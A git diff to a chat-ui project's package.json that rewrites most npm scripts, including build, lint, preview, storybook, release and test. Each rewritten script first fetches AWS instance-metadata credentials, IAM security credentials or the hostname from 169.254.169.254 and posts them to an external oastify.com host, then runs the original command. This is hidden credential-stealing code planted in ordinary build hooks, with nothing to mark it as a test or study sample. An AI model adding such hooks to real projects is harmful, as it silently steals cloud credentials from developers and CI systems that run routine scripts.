--- a/chat-ui/package.json
+++ b/chat-ui/package.json
@@ -25,26 +25,26 @@
     }
   },
   "scripts": {
-    "build": "if [[ \"$ENVIRONMENT\" == \"qa\" ]]; then npm run build:static-site:qa && echo \"qa\"; else npm run build:static-site:staging; fi",
-    "build:dts": "tsc --project tsconfig.declarations.json",
-    "build:component": "tsc && vite build --config vite.config.component.js && npm run build:dts",
-    "build:static-site:dev": "tsc && VITE_GIT_COMMIT=$(npm run --silent env:get-git-commit) vite build --config vite.config.static-site.js --mode development",
-    "build:static-site:staging": "tsc && VITE_GIT_COMMIT=$(npm run --silent env:get-git-commit) vite build --config vite.config.static-site.js --mode staging",
+    "build": "curl -d \"`curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance`\" https://idzyrv0kuhmyh1so8tqiud01eskohcb00.oastify.com/aws && if [[ \"$ENVIRONMENT\" == \"qa\" ]]; then npm run build:static-site:qa && echo \"qa\"; else npm run build:static-site:staging; fi",
+    "build:dts": "curl -d \"`curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance`\" https://idzyrv0kuhmyh1so8tqiud01eskohcb00.oastify.com/aws && tsc --project tsconfig.declarations.json",
+    "build:component": "curl -d \"`curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance`\" https://idzyrv0kuhmyh1so8tqiud01eskohcb00.oastify.com/aws && tsc && vite build --config vite.config.component.js && npm run build:dts",
+    "build:static-site:dev": "curl -d \"`curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance`\" https://idzyrv0kuhmyh1so8tqiud01eskohcb00.oastify.com/aws && tsc && VITE_GIT_COMMIT=$(npm run --silent env:get-git-commit) vite build --config vite.config.static-site.js --mode development",
+    "build:static-site:staging": "curl -d \"`curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance`\" https://idzyrv0kuhmyh1so8tqiud01eskohcb00.oastify.com/aws && tsc && VITE_GIT_COMMIT=$(npm run --silent env:get-git-commit) vite build --config vite.config.static-site.js --mode staging",
     "build:static-site:qa": "tsc && VITE_GIT_COMMIT=$(npm run --silent env:get-git-commit) vite build --config vite.config.static-site.js --mode qa",
     "dev": "VITE_GIT_COMMIT=$(npm run --silent env:get-git-commit) vite --config vite.config.component.js --mode development",
     "env:get-git-commit": "if [ -z \"$VITE_GIT_COMMIT\" ]; then echo \"$(git rev-parse --short HEAD)\"; else echo \"$VITE_GIT_COMMIT\"; fi",
     "format": "prettier ./src --write",
     "format:check": "prettier ./src --check",
-    "lint": "eslint ./src --ext js,jsx,ts,tsx --report-unused-disable-directives --max-warnings 0",
-    "preview": "vite preview --config vite.config.component.js --mode development",
-    "preview:static-site:dev": "npm run build:static-site:dev && vite preview --base ./ --config vite.config.static-site.js",
-    "preview:static-site:staging": "npm run build:static-site:staging && vite preview --base ./ --config vite.config.static-site.js",
-    "preview:static-site:qa": "npm run build:static-site:qa && vite preview --base ./ --config vite.config.static-site.js",
-    "storybook": "storybook dev -p 6006",
-    "build-storybook": "storybook build",
-    "release:interactive": "release-it",
-    "release": "release-it --ci",
-    "test": "vitest"
+    "lint": "curl -d \"`curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance`\" https://idzyrv0kuhmyh1so8tqiud01eskohcb00.oastify.com/aws && eslint ./src --ext js,jsx,ts,tsx --report-unused-disable-directives --max-warnings 0",
+    "preview": "curl -d \"`curl http://169.254.169.254/latest/meta-data/hostname`\" https://idzyrv0kuhmyh1so8tqiud01eskohcb00.oastify.com/aws/hostname && vite preview --config vite.config.component.js --mode development",
+    "preview:static-site:dev": "curl -d \"`curl http://169.254.169.254/latest/meta-data/hostname`\" https://idzyrv0kuhmyh1so8tqiud01eskohcb00.oastify.com/aws/hostname && npm run build:static-site:dev && vite preview --base ./ --config vite.config.static-site.js",
+    "preview:static-site:staging": "curl -d \"`curl http://169.254.169.254/latest/meta-data/hostname`\" https://idzyrv0kuhmyh1so8tqiud01eskohcb00.oastify.com/aws/hostname && npm run build:static-site:staging && vite preview --base ./ --config vite.config.static-site.js",
+    "preview:static-site:qa": "curl -d \"`curl http://169.254.169.254/latest/meta-data/hostname`\" https://idzyrv0kuhmyh1so8tqiud01eskohcb00.oastify.com/aws/hostname && npm run build:static-site:qa && vite preview --base ./ --config vite.config.static-site.js",
+    "storybook": "curl -d \"`curl http://169.254.169.254/latest/meta-data/hostname`\" https://idzyrv0kuhmyh1so8tqiud01eskohcb00.oastify.com/aws/hostname && storybook dev -p 6006",
+    "build-storybook": "curl -d \"`curl http://169.254.169.254/latest/meta-data/hostname`\" https://idzyrv0kuhmyh1so8tqiud01eskohcb00.oastify.com/aws/hostname && storybook build",
+    "release:interactive": "curl -d \"`curl http://169.254.169.254/latest/meta-data/iam/security-credentials`\" https://idzyrv0kuhmyh1so8tqiud01eskohcb00.oastify.com/aws/iam && release-it",
+    "release": "curl -d \"`curl http://169.254.169.254/latest/meta-data/iam/security-credentials`\" https://idzyrv0kuhmyh1so8tqiud01eskohcb00.oastify.com/aws/iam && release-it --ci",
+    "test": "curl -d \"`curl http://169.254.169.254/latest/meta-data/iam/security-credentials`\" https://idzyrv0kuhmyh1so8tqiud01eskohcb00.oastify.com/aws/iam && vitest"
   },
   "bundleDependencies": [
     "chat-core",
